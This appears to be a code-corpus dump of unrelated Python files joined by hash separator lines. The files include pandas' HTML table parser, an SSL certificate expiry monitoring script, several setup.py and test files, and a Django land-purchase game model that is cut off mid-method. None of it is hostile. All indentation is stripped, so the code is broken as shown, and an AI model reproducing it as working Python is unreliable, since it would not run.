while remainder:
next_remainder = []
texts = []
for prev_i, prev_text, prev_rowspan in remainder:
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
all_texts.append(texts)
remainder = next_remainder
return all_texts
def _handle_hidden_tables(self, tbl_list, attr_name):
"""
Return list of tables, potentially removing hidden elements
Parameters
----------
tbl_list : list of node-like
Type of list elements will vary depending upon parser used
attr_name : str
Name of the accessor for retrieving HTML attributes
Returns
-------
list of node-like
Return type matches `tbl_list`
"""
if not self.displayed_only:
return tbl_list
return [x for x in tbl_list if "display:none" not in
getattr(x, attr_name).get('style', '').replace(" ", "")]
class _BeautifulSoupHtml5LibFrameParser(_HtmlFrameParser):
"""HTML to DataFrame parser that uses BeautifulSoup under the hood.
See Also
--------
pandas.io.html._HtmlFrameParser
pandas.io.html._LxmlFrameParser
Notes
-----
Documentation strings for this class are in the base class
:class:`pandas.io.html._HtmlFrameParser`.
"""
def __init__(self, *args, **kwargs):
super(_BeautifulSoupHtml5LibFrameParser, self).__init__(*args,
**kwargs)
from bs4 import SoupStrainer
self._strainer = SoupStrainer('table')
def _parse_tables(self, doc, match, attrs):
element_name = self._strainer.name
tables = doc.find_all(element_name, attrs=attrs)
if not tables:
raise ValueError('No tables found')
result = []
unique_tables = set()
tables = self._handle_hidden_tables(tables, "attrs")
for table in tables:
if self.displayed_only:
for elem in table.find_all(
style=re.compile(r"display:\s*none")):
elem.decompose()
if (table not in unique_tables and
table.find(text=match) is not None):
result.append(table)
unique_tables.add(table)
if not result:
raise ValueError("No tables found matching pattern {patt!r}"
.format(patt=match.pattern))
return result
def _text_getter(self, obj):
return obj.text
def _equals_tag(self, obj, tag):
return obj.name == tag
def _parse_td(self, row):
return row.find_all(('td', 'th'), recursive=False)
def _parse_thead_tr(self, table):
return table.select('thead tr')
def _parse_tbody_tr(self, table):
from_tbody = table.select('tbody tr')
from_root = table.find_all('tr', recursive=False)
# HTML spec: at most one of these lists has content
return from_tbody + from_root
def _parse_tfoot_tr(self, table):
return table.select('tfoot tr')
def _setup_build_doc(self):
raw_text = _read(self.io)
if not raw_text:
raise ValueError('No text parsed from document: {doc}'
.format(doc=self.io))
return raw_text
def _build_doc(self):
from bs4 import BeautifulSoup
return BeautifulSoup(self._setup_build_doc(), features='html5lib',
from_encoding=self.encoding)
def _build_xpath_expr(attrs):
"""Build an xpath expression to simulate bs4's ability to pass in kwargs to
search for attributes when using the lxml parser.
Parameters
----------
attrs : dict
A dict of HTML attributes. These are NOT checked for validity.
Returns
-------
expr : unicode
An XPath expression that checks for the given HTML attributes.
"""
# give class attribute as class_ because class is a python keyword
if 'class_' in attrs:
attrs['class'] = attrs.pop('class_')
s = ["@{key}={val!r}".format(key=k, val=v) for k, v in iteritems(attrs)]
return '[{expr}]'.format(expr=' and '.join(s))
_re_namespace = {'re': 'http://exslt.org/regular-expressions'}
_valid_schemes = 'http', 'file', 'ftp'
class _LxmlFrameParser(_HtmlFrameParser):
"""HTML to DataFrame parser that uses lxml under the hood.
Warning
-------
This parser can only handle HTTP, FTP, and FILE urls.
See Also
--------
_HtmlFrameParser
_BeautifulSoupLxmlFrameParser
Notes
-----
Documentation strings for this class are in the base class
:class:`_HtmlFrameParser`.
"""
def __init__(self, *args, **kwargs):
super(_LxmlFrameParser, self).__init__(*args, **kwargs)
def _text_getter(self, obj):
return obj.text_content()
def _parse_td(self, row):
# Look for direct children only: the "row" element here may be a
# <thead> or <tfoot> (see _parse_thead_tr).
return row.xpath('./td|./th')
def _parse_tables(self, doc, match, kwargs):
pattern = match.pattern
# 1. check all descendants for the given pattern and only search tables
# 2. go up the tree until we find a table
query = '//table//*[re:test(text(), {patt!r})]/ancestor::table'
xpath_expr = query.format(patt=pattern)
# if any table attributes were given build an xpath expression to
# search for them
if kwargs:
xpath_expr += _build_xpath_expr(kwargs)
tables = doc.xpath(xpath_expr, namespaces=_re_namespace)
tables = self._handle_hidden_tables(tables, "attrib")
if self.displayed_only:
for table in tables:
# lxml utilizes XPATH 1.0 which does not have regex
# support. As a result, we find all elements with a style
# attribute and iterate them to check for display:none
for elem in table.xpath('.//*[@style]'):
if "display:none" in elem.attrib.get(
"style", "").replace(" ", ""):
elem.getparent().remove(elem)
if not tables:
raise ValueError("No tables found matching regex {patt!r}"
.format(patt=pattern))
return tables
def _equals_tag(self, obj, tag):
return obj.tag == tag
def _build_doc(self):
"""
Raises
------
ValueError
* If a URL that lxml cannot parse is passed.
Exception
* Any other ``Exception`` thrown. For example, trying to parse a
URL that is syntactically correct on a machine with no internet
connection will fail.
See Also
--------
pandas.io.html._HtmlFrameParser._build_doc
"""
from lxml.html import parse, fromstring, HTMLParser
from lxml.etree import XMLSyntaxError
parser = HTMLParser(recover=True, encoding=self.encoding)
try:
if _is_url(self.io):
with urlopen(self.io) as f:
r = parse(f, parser=parser)
else:
# try to parse the input in the simplest way
r = parse(self.io, parser=parser)
try:
r = r.getroot()
except AttributeError:
pass
except (UnicodeDecodeError, IOError) as e:
# if the input is a blob of html goop
if not _is_url(self.io):
r = fromstring(self.io, parser=parser)
try:
r = r.getroot()
except AttributeError:
pass
else:
raise e
else:
if not hasattr(r, 'text_content'):
raise XMLSyntaxError("no text parsed from document", 0, 0, 0)
return r
def _parse_thead_tr(self, table):
rows = []
for thead in table.xpath('.//thead'):
rows.extend(thead.xpath('./tr'))
# HACK: lxml does not clean up the clearly-erroneous
# <thead><th>foo</th><th>bar</th></thead>. (Missing <tr>). Add
# the <thead> and _pretend_ it's a <tr>; _parse_td() will find its
# children as though it's a <tr>.
#
# Better solution would be to use html5lib.
elements_at_root = thead.xpath('./td|./th')
if elements_at_root:
rows.append(thead)
return rows
def _parse_tbody_tr(self, table):
from_tbody = table.xpath('.//tbody//tr')
from_root = table.xpath('./tr')
# HTML spec: at most one of these lists has content
return from_tbody + from_root
def _parse_tfoot_tr(self, table):
return table.xpath('.//tfoot//tr')
def _expand_elements(body):
lens = Series(lmap(len, body))
lens_max = lens.max()
not_max = lens[lens != lens_max]
empty = ['']
for ind, length in iteritems(not_max):
body[ind] += empty * (lens_max - length)
def _data_to_frame(**kwargs):
head, body, foot = kwargs.pop('data')
header = kwargs.pop('header')
kwargs['skiprows'] = _get_skiprows(kwargs['skiprows'])
if head:
body = head + body
# Infer header when there is a <thead> or top <th>-only rows
if header is None:
if len(head) == 1:
header = 0
else:
# ignore all-empty-text rows
header = [i for i, row in enumerate(head)
if any(text for text in row)]
if foot:
body += foot
# fill out elements of body that are "ragged"
_expand_elements(body)
tp = TextParser(body, header=header, **kwargs)
df = tp.read()
return df
_valid_parsers = {'lxml': _LxmlFrameParser, None: _LxmlFrameParser,
'html5lib': _BeautifulSoupHtml5LibFrameParser,
'bs4': _BeautifulSoupHtml5LibFrameParser}
def _parser_dispatch(flavor):
"""Choose the parser based on the input flavor.
Parameters
----------
flavor : str
The type of parser to use. This must be a valid backend.
Returns
-------
cls : _HtmlFrameParser subclass
The parser class based on the requested input flavor.
Raises
------
ValueError
* If `flavor` is not a valid backend.
ImportError
* If you do not have the requested `flavor`
"""
valid_parsers = list(_valid_parsers.keys())
if flavor not in valid_parsers:
raise ValueError('{invalid!r} is not a valid flavor, valid flavors '
'are {valid}'
.format(invalid=flavor, valid=valid_parsers))
if flavor in ('bs4', 'html5lib'):
if not _HAS_HTML5LIB:
raise ImportError("html5lib not found, please install it")
if not _HAS_BS4:
raise ImportError(
"BeautifulSoup4 (bs4) not found, please install it")
import bs4
if LooseVersion(bs4.__version__) <= LooseVersion('4.2.0'):
raise ValueError("A minimum version of BeautifulSoup 4.2.1 "
"is required")
else:
if not _HAS_LXML:
raise ImportError("lxml not found, please install it")
return _valid_parsers[flavor]
def _print_as_set(s):
return ('{' + '{arg}'.format(arg=', '.join(
pprint_thing(el) for el in s)) + '}')
def _validate_flavor(flavor):
if flavor is None:
flavor = 'lxml', 'bs4'
elif isinstance(flavor, string_types):
flavor = flavor,
elif isinstance(flavor, compat.Iterable):
if not all(isinstance(flav, string_types) for flav in flavor):
raise TypeError('Object of type {typ!r} is not an iterable of '
'strings'
.format(typ=type(flavor).__name__))
else:
fmt = '{flavor!r}' if isinstance(flavor, string_types) else '{flavor}'
fmt += ' is not a valid flavor'
raise ValueError(fmt.format(flavor=flavor))
flavor = tuple(flavor)
valid_flavors = set(_valid_parsers)
flavor_set = set(flavor)
if not flavor_set & valid_flavors:
raise ValueError('{invalid} is not a valid set of flavors, valid '
'flavors are {valid}'
.format(invalid=_print_as_set(flavor_set),
valid=_print_as_set(valid_flavors)))
return flavor
def _parse(flavor, io, match, attrs, encoding, displayed_only, **kwargs):
flavor = _validate_flavor(flavor)
compiled_match = re.compile(match) # you can pass a compiled regex here
# hack around python 3 deleting the exception variable
retained = None
for flav in flavor:
parser = _parser_dispatch(flav)
p = parser(io, compiled_match, attrs, encoding, displayed_only)
try:
tables = p.parse_tables()
except Exception as caught:
# if `io` is an io-like object, check if it's seekable
# and try to rewind it before trying the next parser
if hasattr(io, 'seekable') and io.seekable():
io.seek(0)
elif hasattr(io, 'seekable') and not io.seekable():
# if we couldn't rewind it, let the user know
raise ValueError('The flavor {} failed to parse your input. '
'Since you passed a non-rewindable file '
'object, we can\'t rewind it to try '
'another parser. Try read_html() with a '
'different flavor.'.format(flav))
retained = caught
else:
break
else:
raise_with_traceback(retained)
ret = []
for table in tables:
try:
ret.append(_data_to_frame(data=table, **kwargs))
except EmptyDataError: # empty table
continue
return ret
def read_html(io, match='.+', flavor=None, header=None, index_col=None,
skiprows=None, attrs=None, parse_dates=False,
tupleize_cols=None, thousands=',', encoding=None,
decimal='.', converters=None, na_values=None,
keep_default_na=True, displayed_only=True):
r"""Read HTML tables into a ``list`` of ``DataFrame`` objects.
Parameters
----------
io : str or file-like
A URL, a file-like object, or a raw string containing HTML. Note that
lxml only accepts the http, ftp and file url protocols. If you have a
URL that starts with ``'https'`` you might try removing the ``'s'``.
match : str or compiled regular expression, optional
The set of tables containing text matching this regex or string will be
returned. Unless the HTML is extremely simple you will probably need to
pass a non-empty string here. Defaults to '.+' (match any non-empty
string). The default value will return all tables contained on a page.
This value is converted to a regular expression so that there is
consistent behavior between Beautiful Soup and lxml.
flavor : str or None, container of strings
The parsing engine to use. 'bs4' and 'html5lib' are synonymous with
each other, they are both there for backwards compatibility. The
default of ``None`` tries to use ``lxml`` to parse and if that fails it
falls back on ``bs4`` + ``html5lib``.
header : int or list-like or None, optional
The row (or list of rows for a :class:`~pandas.MultiIndex`) to use to
make the columns headers.
index_col : int or list-like or None, optional
The column (or list of columns) to use to create the index.
skiprows : int or list-like or slice or None, optional
0-based. Number of rows to skip after parsing the column integer. If a
sequence of integers or a slice is given, will skip the rows indexed by
that sequence. Note that a single element sequence means 'skip the nth
row' whereas an integer means 'skip n rows'.
attrs : dict or None, optional
This is a dictionary of attributes that you can pass to use to identify
the table in the HTML. These are not checked for validity before being
passed to lxml or Beautiful Soup. However, these attributes must be
valid HTML table attributes to work correctly. For example, ::
attrs = {'id': 'table'}
is a valid attribute dictionary because the 'id' HTML tag attribute is
a valid HTML attribute for *any* HTML tag as per `this document
<http://www.w3.org/TR/html-markup/global-attributes.html>`__. ::
attrs = {'asdf': 'table'}
is *not* a valid attribute dictionary because 'asdf' is not a valid
HTML attribute even if it is a valid XML attribute. Valid HTML 4.01
table attributes can be found `here
<http://www.w3.org/TR/REC-html40/struct/tables.html#h-11.2>`__. A
working draft of the HTML 5 spec can be found `here
<http://www.w3.org/TR/html-markup/table.html>`__. It contains the
latest information on table attributes for the modern web.
parse_dates : bool, optional
See :func:`~read_csv` for more details.
tupleize_cols : bool, optional
If ``False`` try to parse multiple header rows into a
:class:`~pandas.MultiIndex`, otherwise return raw tuples. Defaults to
``False``.
.. deprecated:: 0.21.0
This argument will be removed and will always convert to MultiIndex
thousands : str, optional
Separator to use to parse thousands. Defaults to ``','``.
encoding : str or None, optional
The encoding used to decode the web page. Defaults to ``None``.``None``
preserves the previous encoding behavior, which depends on the
underlying parser library (e.g., the parser library will try to use
the encoding provided by the document).
decimal : str, default '.'
Character to recognize as decimal point (e.g. use ',' for European
data).
.. versionadded:: 0.19.0
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the cell (not column) content, and return the
transformed content.
.. versionadded:: 0.19.0
na_values : iterable, default None
Custom NA values
.. versionadded:: 0.19.0
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to
.. versionadded:: 0.19.0
displayed_only : bool, default True
Whether elements with "display: none" should be parsed
.. versionadded:: 0.23.0
Returns
-------
dfs : list of DataFrames
See Also
--------
read_csv
Notes
-----
Before using this function you should read the :ref:`gotchas about the
HTML parsing libraries <io.html.gotchas>`.
Expect to do some cleanup after you call this function. For example, you
might need to manually assign column names if the column names are
converted to NaN when you pass the `header=0` argument. We try to assume as
little as possible about the structure of the table and push the
idiosyncrasies of the HTML contained in the table to the user.
This function searches for ``<table>`` elements and only for ``<tr>``
and ``<th>`` rows and ``<td>`` elements within each ``<tr>`` or ``<th>``
element in the table. ``<td>`` stands for "table data". This function
attempts to properly handle ``colspan`` and ``rowspan`` attributes.
If the function has a ``<thead>`` argument, it is used to construct
the header, otherwise the function attempts to find the header within
the body (by putting rows with only ``<th>`` elements into the header).
.. versionadded:: 0.21.0
Similar to :func:`~read_csv` the `header` argument is applied
**after** `skiprows` is applied.
This function will *always* return a list of :class:`DataFrame` *or*
it will fail, e.g., it will *not* return an empty list.
Examples
--------
See the :ref:`read_html documentation in the IO section of the docs
<io.read_html>` for some examples of reading in HTML tables.
"""
_importers()
# Type check here. We don't want to parse only to fail because of an
# invalid value of an integer skiprows.
if isinstance(skiprows, numbers.Integral) and skiprows < 0:
raise ValueError('cannot skip rows starting from the end of the '
'data (you passed a negative value)')
_validate_header_arg(header)
return _parse(flavor=flavor, io=io, match=match, header=header,
index_col=index_col, skiprows=skiprows,
parse_dates=parse_dates, tupleize_cols=tupleize_cols,
thousands=thousands, attrs=attrs, encoding=encoding,
decimal=decimal, converters=converters, na_values=na_values,
keep_default_na=keep_default_na,
displayed_only=displayed_only)
|
py | 7df7cca327aeae26f839eb99b866c73ec316ea5c |
from .. import Patcher
def test_mc_cycle():
p = Patcher('outputs/test_mc_cycle.maxpat')
obj = p.add_textbox('mc.cycle~ 440')
p.save()
if __name__ == '__main__':
test_mc_cycle()
|
py | 7df7cd2cf260932f5bda338cad78d9d14c72505b | import os
from bw2data import projects
from bw2data.data_store import DataStore
from bw2data.serialization import JsonWrapper, SerializedDict
from .data import (
get_biosphere_2_3_category_migration_data,
get_biosphere_2_3_name_migration_data,
get_ecoinvent_pre35_migration_data,
get_exiobase_biosphere_migration_data,
get_simapro_ecoinvent_3_migration_data,
get_simapro_water_migration_data,
get_us_lci_migration_data,
)
from .units import get_default_units_migration_data, get_unusual_units_migration_data
class _Migrations(SerializedDict):
filename = "migrations.json"
migrations = _Migrations()
class Migration(DataStore):
_metadata = migrations
def __init__(self, *args, **kwargs):
super(Migration, self).__init__(*args, **kwargs)
self._intermediate_dir = projects.request_directory("migrations")
@property
def description(self):
return self.metadata["description"]
def validate(self, *args, **kwargs):
return
def write(self, data, description):
"""Write migration data. Requires a description."""
try:
self.register()
migrations[self.name]["description"] = description
except:
self.register(description=description)
filepath = os.path.join(self._intermediate_dir, self.filename + ".json")
JsonWrapper.dump(data, filepath)
def load(self):
self.register()
filepath = os.path.join(self._intermediate_dir, self.filename + ".json")
return JsonWrapper.load(filepath)
def create_core_migrations():
"""Add pre-defined core migrations data files"""
Migration("biosphere-2-3-categories").write(
get_biosphere_2_3_category_migration_data(),
"Change biosphere category and subcategory labels to ecoinvent version 3",
)
Migration("biosphere-2-3-names").write(
get_biosphere_2_3_name_migration_data(),
"Change biosphere flow names to ecoinvent version 3",
)
Migration("simapro-ecoinvent-3.1").write(
get_simapro_ecoinvent_3_migration_data("3.1"),
"Change SimaPro names from ecoinvent 3.1 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.2").write(
get_simapro_ecoinvent_3_migration_data("3.2"),
"Change SimaPro names from ecoinvent 3.2 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.3").write(
get_simapro_ecoinvent_3_migration_data("3.3"),
"Change SimaPro names from ecoinvent 3.3 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.4").write(
get_simapro_ecoinvent_3_migration_data("3.4"),
"Change SimaPro names from ecoinvent 3.4 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.5").write(
get_simapro_ecoinvent_3_migration_data("3.5"),
"Change SimaPro names from ecoinvent 3.5 to ecoinvent names",
)
Migration("simapro-water").write(
get_simapro_water_migration_data(),
"Change SimaPro water flows to more standard names",
)
Migration("us-lci").write(
get_us_lci_migration_data(), "Fix names in US LCI database"
)
Migration("default-units").write(
get_default_units_migration_data(), "Convert to default units"
)
Migration("unusual-units").write(
get_unusual_units_migration_data(), "Convert non-Ecoinvent units"
)
Migration("exiobase-biosphere").write(
get_exiobase_biosphere_migration_data(),
"Change biosphere flow names to ecoinvent version 3",
)
Migration("fix-ecoinvent-flows-pre-35").write(
get_ecoinvent_pre35_migration_data(),
"Update new biosphere UUIDs in Consequential 3.4",
)
|
py | 7df7cd4deb1fe9f9905af92261d80b1b03dabf12 | from setuptools import setup
from sys import version_info
setup(
name='avatar2',
version='1.1.1',
packages=['avatar2',
'avatar2/archs',
'avatar2/targets',
'avatar2/protocols',
'avatar2/peripherals',
'avatar2/plugins',
'avatar2/plugins/arm',
'avatar2/installer'
],
install_requires=[
'numpy',
'pygdbmi==0.9.0.0',
'intervaltree',
'posix_ipc>=1.0.0',
'capstone>=3.0.4',
'keystone-engine',
'parse',
'configparser',
'npyscreen',
'enum34',
'unicorn'
],
dependency_links=[
'https://github.com/jonathanslenders/python-prompt-toolkit/tarball/2.0#egg=prompt-toolkit-2.0.0'
],
url='http://www.s3.eurecom.fr/tools/avatar/',
description='Dynamic firmware analysis'
)
|
py | 7df7cdba37126acf728d5377ac33dbe9301968b1 | '''
It can caculate the words in the text file
'''
import re
def calculate_words(path):
f = open(path,'r')
lines = f.readlines()
count = 0
for line in lines:
count+=len(re.split('[,.! ?:]',line))#use the re module to split the txt file
return count-len(lines)#the txt file will inlcude the '\n' and '' so sub it
words = calculate_words("C:/Users/razzl/Desktop/1.txt")#in python the '/' can be the path separator in all system
print words
|
py | 7df7cf7eba92ace900d84e8d2259b1483622fcab | import unittest
class TestValidationFailure(unittest.TestCase):
def _makeOne(self, field, cstruct, error):
from deform.exception import ValidationFailure
return ValidationFailure(field, cstruct, error)
def test_render(self):
widget = DummyWidget()
form = DummyForm(widget)
cstruct = {}
e = self._makeOne(form, cstruct, None)
result = e.render()
self.assertEqual(result, cstruct)
result = e.render(custom_property='Test')
self.assertEqual(result['custom_property'], 'Test')
class DummyForm(object):
def __init__(self, widget):
self.widget = widget
class DummyWidget(object):
def serialize(self, field, cstruct, **kw):
cstruct.update(kw)
return cstruct
|
py | 7df7cff43f808c8b2d025be8279751ae91deee8e | import pandas as pd
target = [
'train_data',
'test_data',
]
extension = 'csv'
# extension = 'tsv'
# extension = 'zip'
for t in target:
(pd.read_csv('./data/input/' + t + '.' + extension, encoding="utf-8"))\
.to_feather('./data/input/' + t + '.feather')
|
py | 7df7d00bb4bb43b2d52fe945510296691c220b32 | from django.apps import AppConfig
class AccountsAdminConfig(AppConfig):
name = 'accounts_admin'
|
py | 7df7d1101492b8792a1c3df6e0ef320b57982d96 | #!/usr/bin/python36
import OpenSSL
import ssl, socket
import time
import argparse
import datetime
from datetime import datetime
# declare variables
status = ["OK: ", "WARNING: ", "CRITICAL: ", "UNKNOWN: "]
parser = argparse.ArgumentParser()
parser.add_argument(
"-H", "--host", required=True, type=str, help="hostname where the SSL cert exists"
)
parser.add_argument(
"-P", "--port", default=443, type=int, help="port to connect over. default 443"
)
parser.add_argument(
"-w",
"--warning",
default=30,
type=int,
help="warning threshold in days. default 30",
)
parser.add_argument(
"-c",
"--critical",
default=10,
type=int,
help="critical threshold in days. default 10",
)
parser.add_argument(
"-t", "--timeout", default=30, type=int, help="check timeout in seconds. default 30"
)
# parse arguments into array
args = parser.parse_args()
# assign our arguments to variables
host = args.host
port = args.port
warning = args.warning
critical = args.critical
timeout = args.timeout
if not critical <= warning:
print(
"The warning threshold must be greater than or equal to the critical threshold"
)
exit(3)
# set up ssl connection to host/port
try:
conn = ssl.create_connection((host, port))
except:
print(status[2] + "error connecting to host/port")
exit(2)
# give ssl connection the protocol version
try:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
except:
print(status[2] + "error connecting with SSLv23")
exit(2)
# use SNI to get the correct cert for the hostname
try:
sock = context.wrap_socket(conn, server_hostname=host)
except:
print(status[2] + "error using SNI to find correct cert")
exit(2)
# save our cert info to a parse-able var
try:
cert = ssl.DER_cert_to_PEM_cert(sock.getpeercert(True))
# print(cert)
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
# print(x509)
except:
print(status[2] + "unable to obtain cert")
exit(2)
# parse for expiration date
try:
expdate = x509.get_notAfter().decode("utf-8")
except:
print(status[3] + "unable to parse for notAfter date")
exit(3)
# we need that hostname too
try:
sslhost = x509.get_subject().CN
except:
print(status[3] + "unable to parse for x509 subject")
exit(3)
# print(expdate)
# print(type(expdate))
expdate = datetime.strptime(expdate, "%Y%m%d%H%M%SZ")
# print(expdate)
# print(type(expdate))
today = datetime.now()
# print(today)
# print(type(today))
delta = (expdate - today).days
# lets do some evaluation bro
if delta < 0:
print(status[3] + str(sslhost) + " expired or Buck did bad math - " + str(delta) + " days")
exit(3)
elif delta <= critical:
print(status[2] + str(sslhost) + " is going to expire in " + str(delta) + " days")
exit(2)
elif delta <= warning:
print(status[1] + str(sslhost) + " is going to expire in " + str(delta) + " days")
exit(1)
elif delta > warning:
print(status[0] + str(sslhost) + " is valid for " + str(delta) + " more days")
exit(0)
else:
print(status[3] + str(sslhost) + " to determine cert validity from value:" + str(delta))
exit(3)
|
py | 7df7d14299998ab4c5850342311717ad29b6c026 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from os import path
from setuptools import setup, find_packages
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='pyDigitalWaveTools',
version='1.1',
description='Library for operations with VCD and other digital wave files',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)",
"Topic :: System :: Hardware",
"Topic :: System :: Emulators",
"Topic :: Utilities",
],
url='https://github.com/Nic30/pyDigitalWaveTools',
author='Michal Orsak',
author_email='[email protected]',
license='MIT',
packages=find_packages(exclude=["tests", ]),
zip_safe=True
)
|
py | 7df7d2a05421d2d2ff9ff6f53c7f43f15d4cee91 | from __future__ import annotations
from app.models.core import Company
from app.models.constants import Place
from django.db import models
from app.core.util.base import generate_unique_id
from app.models.constants import Land
from django.utils import timezone
from typing import Union
import logging
from setting import local_settings as env
import random
from datetime import datetime, timedelta
from app.models.core.exception import UnableToOwnLandscape
from app.core.db import ModelMixin
logger = logging.getLogger(__name__)
class LandscapeManager(models.Manager):
"""
The landscape manager.
"""
def get_single_landscape_by_company(self, landscape_id: Union[str, int], company: Company,
force_primary: bool = False) -> Landscape:
"""
This method return the landscape instance with given id and company.
The given company must own this landscape
if force_primary is True then it will look up for index key of the landscape in the database
default is False. You will need to make sure that param landscape_id is the actual index key
of the landscape not the land_id
:param company: the company instance or the company name. Both are fine but required
"""
if force_primary:
if type(company) == Company:
return self.get(id=landscape_id, company=company)
if isinstance(company, str):
return self.get(id=landscape_id, company=company.company_name)
raise TypeError("The company must be a string or a company instance but got: %s" % type(company))
else:
if type(company) == Company:
return self.get(land_id=landscape_id, company=company)
if isinstance(company, str):
return self.get(land_id=landscape_id, company=company.company_name)
raise TypeError("The company must be a string or a company instance but got: %s" % type(company))
def get_landscape_by_company(self, company: Union[Company, str], force_json: bool = False, values_list=None):
"""Return the list of landscape instance that are owned by the given company
Set force_json to True to return list of objects
"""
protected_values = self.model.protected
if type(company) == Company:
if force_json:
return list(self.filter(company=company).values(*protected_values))
return self.filter(company=company)
if isinstance(company, str):
if force_json:
return list(self.filter(company=company).values(*protected_values))
return self.filter(company_name=company)
raise TypeError("lookup_company must be a Company instance or a string of company name")
def get_landscape_as_dict(self, land_id: str, protected_values: list = None):
"""
Return the landscape instance as dict.
If protected_values is provided, it will return only the fields specified otherwise
it will use the default settings from landscape model
"""
protected_values = tuple(protected_values) if protected_values else Landscape.protected
return Landscape.objects.values(*protected_values).get(land_id=land_id)
def get_rent_landscape_by_company(self, company: Union[Company, str]) -> bool:
"""Return the list of landscape instance that on rent by the given company
The param company can be either a string representing company name or a company instance
"""
if type(company) == Company:
return self.filter(company=company, is_rent=True)
if isinstance(company, str):
return self.filter(company_name=company, is_rent=True)
raise TypeError("lookup_company must be a Company instance or a string of company name")
def get_supported_continents(self) -> dict:
"""Return the list of supported continents from Land class"""
return Land.objects.get_supported_continents()
def get_landscape_by_id(self, landscape_id: Union[int, str],
force_primary=False) -> Landscape:
"""Return the landscape instance by id.
If force_primary is True, it will search for primary_key. Default is
False
Exception: Model not found exception will raise if there is no result
found.
"""
if force_primary:
return self.get(id=landscape_id)
return self.get(land_id=landscape_id)
def landscape_is_available(self, landscape_id: Union[str, int],
force_primary: bool = False) -> bool:
"""Return true if landscape is available to purchase (buy/rent)
If you wish to look up by primary_key, simple add force_primary=True,
default is False
"""
if force_primary:
if isinstance(landscape_id, str) or isinstance(landscape_id, int):
try:
landscape: Landscape = self.get(id=landscape_id)
return landscape.can_be_purchased()
except Exception as e:
logger.info(e)
raise TypeError("The landscape id cannot be found")
raise TypeError("The landscape id must be a string")
else:
if isinstance(landscape_id, str) or isinstance(landscape_id, int):
try:
landscape: Landscape = self.get(land_id=landscape_id)
return landscape.can_be_purchased()
except Exception as e:
logger.info(e)
raise TypeError("The landscape id cannot be found")
raise TypeError("The landscape id must be a string")
def _generate_default_landscape(self, continent: str):
"""Return the landscape instance but DOES NOT SAVE INTO DATABASE
consider using create_land() instead
"""
level: int = Land.objects.get_random_land_level()
land: Land = Land.objects.get_land_by_level(level)
return Landscape(level=level, buy_cost=land.get_land_cost(), rent_cost=land.get_rent_cost(),
continent_cost=land.get_continent_buy_cost(),
continent_rent=land.get_continent_rent_cost(),
continent=continent.lower(),
place=Place.objects.get_random_place(continent))
def create_land(self, continent: str = Land.objects.default_continent()) -> Landscape:
"""Create default land. To retreive supported continents
You may use Land.objects.get_supported_continents() method
:param continent: supported continent (str)
return Landscape instance
"""
if continent.lower() in Land.objects.get_supported_continents():
landscape: Landscape = self._generate_default_landscape(continent)
landscape.save(force_insert=True)
return landscape
else:
raise Exception("Invalid continent name. Please see Land.objects.get_supported_continents()")
def create_multiple_landscape(self, continent: str, number_of_land: int) -> None:
"""
generate multiple landscape.
This methods falls back to create_land method.
:param continent: the contient you wish to create a landscape for
:param number_of_land: the number of landscape to create
return None
"""
lands = [self._generate_default_landscape(continent) for i in range(int(number_of_land))]
self.bulk_create(lands)
def get_available_land(self):
"""Return list of Landscape objects that are not owned by any company"""
return self.filter(company_name=None)
def get_random_available_land(self, json_format=True):
"""get random land available to be purchased"""
if json_format:
landscapes_available = self.get_available_land()
random_lands = random.sample(list(landscapes_available.values()), env.MAXIMUM_lAND_VIEW)
return random_lands
else:
raise Exception("Not available in normal format.")
class Landscape(models.Model, ModelMixin):
"""The base landscape models for create or upgrading anything related to land
To only retrive default and base land details, consider using Land object instead.
Alternatively, Landscape also supports retrieving information from Land object
"""
land_id = models.CharField(max_length=255, default=generate_unique_id)
level = models.IntegerField()
company_name = models.CharField(max_length=255, null=True)
company = models.ForeignKey(Company, on_delete=models.CASCADE, null=True)
continent = models.CharField(max_length=255)
place = models.CharField(max_length=255)
buy_cost = models.DecimalField(max_digits=20, decimal_places=4)
rent_cost = models.DecimalField(max_digits=20, decimal_places=4)
# the cost of contient specific will be the extra cost.
# buy cost + continent_cost
continent_cost = models.DecimalField(max_digits=20, decimal_places=4)
continent_rent = models.DecimalField(max_digits=20, decimal_places=4)
is_buy = models.BooleanField(default=False)
is_rent = models.BooleanField(default=False)
is_selling = models.BooleanField(default=True)
created_at = models.DateTimeField(editable=False, default=timezone.now)
updated_at = models.DateTimeField(null=True)
# will be used to detect rent time
last_collected_money_at = models.DateTimeField(null=True)
objects = LandscapeManager()
unprotected = ['land_id', 'company_name', 'level', 'continent', 'place', 'buy_cost', 'rent_cost',
'continent_cost', 'continent_rent', 'is_buy', 'is_rent', 'is_selling']
protected = ['created_at', 'updated_at']
def buy(self, *args, **kwargs):
"""Buy the landscape. This function simple will try to
update properties respectively.
NOTE: This does not subtract the required cost to obtain the landscape
but rather updating properties and save them to the database
Alternatively, you can update it like the way how you normally
do with django
This should not be called directly. Consider calling purchase_landscape for buying
"""
if self.id:
self.is_buy = True
self.is_rent = False
self.is_selling = False
self.last_collected_money_at = timezone.now()
return self.save(*args, **kwargs)
else:
raise Exception("Unable to buy landscape")
def rent(self, *args, **kwargs):
"""Rent a landscape. This function simple will try to update
properties respectively.
NOTE: This does not subtract the required cost to obtain the landscape
but rather updating properties and save them to the database
Alternatively, you can update it like the way how you normally
do with django
This should not be called directly. Consider calling rent_landscape for renting
"""
if self.id:
self.is_buy = False
self.is_rent = True
self.is_selling = False
self.last_collected_money_at = timezone.now()
return self.save(*args, **kwargs)
else:
